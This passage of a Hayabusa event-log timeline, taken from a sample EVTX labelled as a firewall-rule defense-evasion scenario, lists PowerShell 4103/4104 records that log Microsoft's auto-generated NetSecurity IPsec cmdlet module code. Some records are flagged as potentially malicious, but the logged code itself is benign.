$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { 
[object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in 
$InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.445 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.449 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.450 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.451 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.452 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { 
Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') 
